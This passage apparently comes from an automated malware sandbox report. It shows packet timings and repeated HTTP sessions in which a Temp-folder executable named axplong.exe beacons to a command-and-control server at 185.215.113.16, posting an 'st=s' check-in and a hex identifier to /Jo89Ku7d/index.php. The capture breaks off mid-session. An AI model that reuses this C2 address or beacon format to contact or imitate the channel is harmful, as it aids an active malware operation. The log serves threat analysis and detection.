                      Jul 27, 2024 09:36:02.741925001 CEST8049773185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:02.988058090 CEST8049773185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:02.988185883 CEST4977380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.097528934 CEST4977380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.097799063 CEST4977480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.104589939 CEST8049774185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:03.104634047 CEST8049773185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:03.104718924 CEST4977480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.104758024 CEST4977380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.104902983 CEST4977480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.109992027 CEST8049774185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:03.853441000 CEST8049774185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:03.854269981 CEST4977480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.956034899 CEST4977480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.956723928 CEST4977580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.961754084 CEST8049775185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:03.961970091 CEST8049774185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:03.961986065 CEST4977580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.962023020 CEST4977480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.962127924 CEST4977580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:03.966984987 CEST8049775185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:04.722702980 CEST8049775185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:04.722806931 CEST4977580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:04.833785057 CEST4977580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:04.834635019 CEST4977680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:04.839982033 CEST8049775185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:04.840024948 CEST8049776185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:04.840076923 CEST4977580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:04.840110064 CEST4977680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:04.840260029 CEST4977680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:04.845408916 CEST8049776185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:05.665412903 CEST8049776185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:05.666081905 CEST4977680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:05.668539047 CEST4977680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:05.668919086 CEST4977780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:05.674194098 CEST8049777185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:05.674292088 CEST4977780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:05.674417973 CEST4977780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:05.674839020 CEST8049776185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:05.675978899 CEST4977680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:36:05.679517984 CEST8049777185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:06.430763960 CEST8049777185.215.113.16192.168.2.6
                      Jul 27, 2024 09:36:06.431768894 CEST4977780192.168.2.6185.215.113.16
                      • 185.215.113.16
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649720185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:02.987384081 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:03.733216047 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:03.735327005 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:03.981780052 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.649721185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:04.103796005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:04.854263067 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:04.855166912 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:05.128138065 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.649722185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:05.244261026 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:06.046369076 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:06.047327042 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:06.294701099 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.649723185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:06.415327072 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:07.175765991 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:07.176584959 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:07.425575018 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.649724185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:07.541480064 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:08.305969000 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:08.306699991 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:08.554152012 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.649725185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:08.666590929 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:09.411015987 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:09.411914110 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:09.661366940 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.649726185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:09.774835110 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:10.546828032 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:10.547522068 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:10.800358057 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.649728185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:10.916477919 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:11.670475006 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:11.672993898 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:11.917912960 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.649729185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:12.025892973 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:13.738756895 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:13.739223003 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:13.739362001 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:13.739873886 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:13.740161896 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:14.227438927 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.649730185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:14.340356112 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:15.177979946 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:15.179322004 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:15.426304102 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
